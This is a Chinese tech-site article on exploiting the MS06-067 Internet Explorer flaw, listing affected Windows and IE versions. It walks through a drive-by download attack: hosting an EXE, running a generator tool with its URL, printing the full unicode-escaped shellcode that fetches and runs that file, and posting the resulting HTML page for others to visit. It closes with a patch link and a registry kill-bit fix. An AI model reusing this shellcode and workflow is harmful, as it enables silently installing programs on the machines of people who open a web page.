频道直达:新闻 - 组网 - 安全 - 服务器 - 存储 - 系统 - 应用 - 开发 - 数据库 - 前沿 - 技术人 - 培训 - 求职 - 读书 - 教程 - 专题 - 产品 - 案例 - 技术圈 - 博客 - BBS
51CTO.COM_中国领先的IT技术网站
首页>>网络安全>>漏洞补丁>>
找资料:

令人汗颜的IE最新漏洞(MS06-067)测试

作者: IceskYsl@1st  出处:1steam 2007-03-27 10:17    砖    好    评论   进入论坛
阅读提示:本文是关于IE最新漏洞(MS06-067)的代码。

这个漏洞太恐怖了,恐怖的让我不敢写出来,考虑到马上网上这样的工具都会泛滥,还是提前告诉大家比较好,我不详细的利用过程,如果你接触过类似的,肯定是会使用的,再次奉劝大家,测试为主,不要乱挂马,危害他人!

受影响的系统:

Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 2

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows Server 2003(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 x64 Edition

受影响软件:

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

不受影响软件:

Internet Explorer 7

利用过程如下,

1、首先把一个你需要运行的EXE文件放在网上,得到地址: http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。

2、接着看下这个生成工具(LION提供的,谢)的使用方法:

Usage: e:/ms_exp/06067/ms06067.exe [htmlfile]--就是你的EXE的路径,如我这里的“按钮突破专家”的地址:

[htmlfile]--需要生成的HTML文件的名称,如我这里的1st.html

3、生成过程,按照上面的格式就可以生成了,过程如下: 

E:\Ms_exp\06067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html
[+] download url:http://www.1steam.cn/tools/jhzj.exe
[+] exploit file:1st.html
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c"
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000"
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516"
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456"
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300"
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856"
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56"
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be"
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775"
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd"
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e"
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a"
"%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574"
"%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a"
"%u652e%u6578%u0000";
[+] exploit write to 1st.html success!

看到这句:[+] exploit write to 1st.html success!就说明成功了。可以去ms06067.exe的目录下,看到生成的HTML文件1st.html。

4、把这个HTML文件放在网上,给人家访问就可以了,我这里的这个测试网页地址在:

http://www.1steam.cn/modiy/1st.html ,你可以打开看看效果,如果你能看到运行的“按钮突破专家”,说明成功。

5、修补

官方已经除了补丁,地址在:http://www.microsoft.co.ke/china ... letin/MS06-067.mspx。

或者修补如下(LION提供的,再谢):

请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件: 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet 
Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
"Compatibility Flags"=dword:00000400

双击此.reg文件将其应用到各个系统。

【责任编辑:雪花 TEL:(010)68476606-8008】

关于 测试  漏洞  最新  生成  过程  地址  系统
专题
2008年上半年全国软考最新试题、答案及点评
2008年4月全国计算机等级考试最新试题及答案
系统应用日志分析管理
测试开发人员参考手册
网络管理系统如何支撑ITSM
我也说两句
叫 好
拍 砖

匿名发表

(如果看不清请点击图片进行更换)


中 国 领 先 的 IT 技 术 网 站 ·
技 术 成 就 梦 想
·解析窃听技术:从窃听方法到防御技..
·实战经验:防火墙设置错误引起迅雷..
· 28-30日病毒预报:“视..
· LinkProof Branch助某..
· 解析窃听技术:从窃听..
 · 企业如何进行计算机取..
· 发现新病毒 ntldr.exe ..
· J0ker的CISSP之路:系..
 		  · 网络端口安全防护技巧 ..
· 19日病毒预报:木马家..
· 实战经验:防火墙设置..
 · 在XP系统下装红旗的Lin..
· xp系统中关于工作组的..
· Apex ITManager网络运..
排行榜
·ARP协议及欺骗原理
·独家体验:在西三环亲历北京免费无..
· 2008上半年全国软考各..
· 周末病毒预报:视频宝..
· NAC精要指南:什么是网..
· 布线测试中的常见问题..
· ASP.NET Ajax网站开发..
· 网管员必读:网络链路..
· SQL Server 2008中不推..
· 路由器故障排除实例讲解
   · Cisco 认证考试费用全..
· 微软针对XP SP2的远程..
· 山东临沂网通联合公安..
· Cisco考试费用全线涨价..
· 企业无线网络设置10大..
· Windows Server 2003网..
· 上海宣判三起网络知识..
· 微软Sever 2008自带虚..
订阅技术快讯
查看样刊
电子杂志下载
名称:SQL Server数据库管理精品黄皮书
简介:书中文章经过精挑细选,便于用户能根据自己的实际工作和学习,快速在本书寻找到相关资料。内容涵盖了SQL Server的安装与升级、语句查询、数据备份和恢复、自动化任务、数据同步、数据字典、安全和预防、性能和优化、集群等各方面应用信息,以及DBA管理人员在数据库管理工作中
名称:2007路由技术大全
简介:《2007路由技术大全》由51CTO.com网站特别策划制作,该书包括路由器技术、路由器产品、路由器配置、安全设置、路由器故障处理、路由器密码恢复,以及广大网友在实践使用中的心得经验和技巧文章,内容注重实用性,适用于初学者入门,也适合多年从业者提高,是一本实践和理论完
名称:网络安全精品应用黄皮书
简介:《2007精品网络安全黄皮书》包括了9个大类24个小类, 800余篇文章,内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范,涉及到了安全应用的全部领域, 由浅至深内容全面。
专题
2008年上半年全国软考最新试题、答案及点评
2008年上半年全国..		浏览器的战国时代
浏览器的战国时代		ARP攻击防范与解决方案
ARP攻击防范与解..
· ARP攻击防范与解决方案
· NAC安全访问控制
· 网络布线测试仪器
· Windows Server 2008专..
· Windows远程桌面应用
· 网络故障排除宝典
· 运营商封堵ADSL共享 中..
· 解析35岁技术人的价值..
 · 世纪枭雄比尔盖茨的王..
· 主流品牌防火墙配置
· ASP.NET开发教程
· 超级计算机TOP500专题
· Vista SP1对决XP SP3
· SQL Server 2008/2005..
· 程序员如何成长?
· C#技术开发指南
ARP攻击防范与解决方案
ARP攻击防范与解..		SQL Server 2008/2005全解
SQL Server 2008/..		SOA 面向服务架构
SOA 面向服务架构
· SOA 面向服务架构
· SQL Server 2008/2005..
· Apache技术专题
· 三层交换技术专题
· SQL Server入门到精通
· Windows远程桌面应用
· C#技术开发指南
· Apache技术专题
 · Windows集群服务应用
· C#技术开发指南
· 国际文档格式标准开战
· 路由器设置与口令恢复
· Linux 集群技术专题
· PHP开发应用手册
· SOA 面向服务架构
· 企业数据恢复指南
ARP攻击防范与解决方案
ARP攻击防范与解..		SQL Server 2008/2005全解
SQL Server 2008/..		SQL Server入门到精通
SQL Server入门到..
· SQL Server入门到精通
· SQL Server 2008/2005..
· SOA 面向服务架构
· Apache技术专题
· C#技术开发指南
· 三层交换技术专题
· Apache技术专题
· C#技术开发指南
 · Windows远程桌面应用
· 企业数据恢复指南
· Windows集群服务应用
· 路由器设置与口令恢复
· Linux 集群技术专题
· SOA 面向服务架构
· 了解统一威胁管理(UTM)..
· 反垃圾邮件技术应用